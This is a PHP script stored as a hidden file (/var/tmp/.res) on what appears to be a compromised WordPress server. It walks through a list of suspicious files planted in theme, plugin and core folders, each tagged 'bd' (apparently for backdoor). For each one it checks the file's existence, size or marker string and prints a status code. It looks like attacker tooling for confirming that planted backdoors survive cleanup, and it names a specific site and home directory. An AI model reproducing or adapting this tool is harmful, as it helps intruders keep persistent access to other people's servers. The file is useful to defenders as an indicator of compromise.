File: //var/tmp/.res
<?php   $r = '/home/drernst/ordinarystories.internet-minded.info'; $x = ["/wp-content/themes/twentytwentyfour/patterns/cta-rsvp.php"=>"bd@@84939@@Content-Security-Policy",
"/wp-content/plugins/html5-audio-player/admin/framework/classes/nav-menu-options.class.php"=>"bd@@85104@@17",
"/wp-content/plugins/advanced-custom-fields/includes/deprecated.php"=>"bd@@85179@@59",
"/wp-content/plugins/html5-audio-player/admin/framework/functions/customize.php"=>"bd@@85261@@100",
"/wp-content/plugins/html5-audio-player/admin/framework/fields/subheading/subheading.php"=>"bd@@85471@@83",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Plugin/Backoff/anonymous.php"=>"bd@@85671@@607",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Description/editSeminar.php"=>"bd@@85798@@671",
"/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Exceptions/menu4.php"=>"bd@@85879@@537",
"/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Http/pane.php"=>"bd@@85955@@597",
"/wp-includes/field.php"=>"bd@@84740@@29669",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Batch/makepdf_class.php"=>"bd@@86064@@604"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');